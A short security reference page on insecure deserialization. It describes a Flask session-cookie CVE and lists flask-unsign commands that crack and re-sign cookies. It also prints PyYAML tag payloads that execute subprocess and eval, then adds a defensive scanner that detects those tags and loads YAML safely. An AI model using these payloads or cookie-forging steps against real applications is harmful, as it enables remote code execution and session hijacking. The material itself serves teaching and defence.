Insecure Deserialization


Insecure Deserialization is a vulnerability that occurs when an application deserializes untrusted data and the deserialization process can be exploited to run malicious code.


Example CVEs

CVE-2021-33026 (Flask/Python)


An insecure deserialization in Flask (Python) allowed an attacker to craft a malicious cookie with a command inside. When the cookie was deserialized, the command was executed by the server.

$ pip3 install flask-unsign[wordlist]
$ sudo ln -s /home/<xxx>/.local/bin/flask-unsign /usr/bin/flask-unsign
$ flask-unsign --decode --cookie 'cookie'        # decode
$ flask-unsign --unsign --cookie 'cookie'        # find key
$ flask-unsign --sign --cookie '' --secret 'dev' # encode

Yaml - Deserialization


PyYAML version 6 and below instantiated an insecure parser by default, which could be exploited to run Python code.

xxx: !!python/object/apply:time.sleep [2]

The xxx: key is only necessary if a specific element (e.g., xxx) is rendered by the application.

!!python/object/apply:builtins.range [1,10,1]
!!python/object/apply:subprocess.Popen ["ls"]
!!python/object/apply:subprocess.check_output [['ls', '-la']]
!!python/object/apply:builtins.eval [ "5" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess') or 'error'" ]
!!python/object/apply:builtins.eval [ "__import__('subprocess').check_output(['ls', '-l']).decode('utf-8') or 'error'" ]
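A defender-side check for the PyYAML payloads above, added here as an example that is not part of the original page: it pre-scans untrusted YAML text for python/* tags and then parses only with yaml.safe_load, which refuses those tags. The sample documents are constructed, and the optional PyYAML import is an assumption about the environment.

```python
"""Refuse python/* tags in untrusted YAML and never use the unsafe loader."""
import re
from typing import List, Optional

try:
    import yaml  # PyYAML (assumed available; scanner below works without it)
except ImportError:
    yaml = None

# Tags that make PyYAML's unsafe loaders instantiate or call Python objects.
DANGEROUS_TAG = re.compile(r"!!python/(?:object(?:/apply|/new)?|name|module)\b")


def find_dangerous_tags(document: str) -> List[str]:
    """Return every python/* tag found in the raw text, with its line number.
    This is a logging/detection aid only: tag aliases (%TAG directives, the
    long tag:yaml.org,2002:python/... form) are not covered, so the real
    control is the loader choice in load_untrusted()."""
    hits = []
    for lineno, line in enumerate(document.splitlines(), 1):
        for m in DANGEROUS_TAG.finditer(line):
            hits.append(f"line {lineno}: {m.group(0)}")
    return hits


def load_untrusted(document: str):
    """Parse with yaml.safe_load only; reject documents carrying python/* tags."""
    hits = find_dangerous_tags(document)
    if hits:
        raise ValueError("refusing YAML with python/* tags: " + "; ".join(hits))
    if yaml is None:
        raise RuntimeError("PyYAML is not installed")
    return yaml.safe_load(document)  # never yaml.load / yaml.unsafe_load


def safe_loader_rejects(document: str) -> Optional[bool]:
    """True if yaml.safe_load refuses the document (None when PyYAML is absent)."""
    if yaml is None:
        return None
    try:
        yaml.safe_load(document)
    except yaml.YAMLError:  # ConstructorError for unknown/unsafe tags
        return True
    return False


# Constructed samples: the page's time.sleep payload and a benign config.
MALICIOUS = "xxx: !!python/object/apply:time.sleep [2]\n"
BENIGN = "xxx: 2\nname: demo\n"
```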

See also: python-deserialization-payload-generator (0.08k ⭐).